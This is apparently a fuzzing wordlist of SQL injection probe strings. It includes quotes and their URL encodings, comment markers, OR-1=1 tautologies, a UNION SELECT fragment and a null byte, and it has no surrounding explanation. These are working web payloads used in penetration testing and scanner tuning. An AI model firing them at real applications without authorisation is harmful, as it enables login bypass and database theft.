'/,
%27/,
"/,
%22/,
%23/,
;/,
%3B/,
)/,
Wildcard (*)/,
' or "/,
-- or #/,
' OR '1/,
' OR 1 -- -/,
" OR "" = "/,
" OR 1 = 1 -- -/,
' OR '' = '/,
'='/,
'LIKE'/,
'=0--+/,
 OR 1=1/,
' OR 'x'='x/,
' AND id IS NULL; --/,
'''''''''''''UNION SELECT '2/,
%00/,
/*…*/ /,
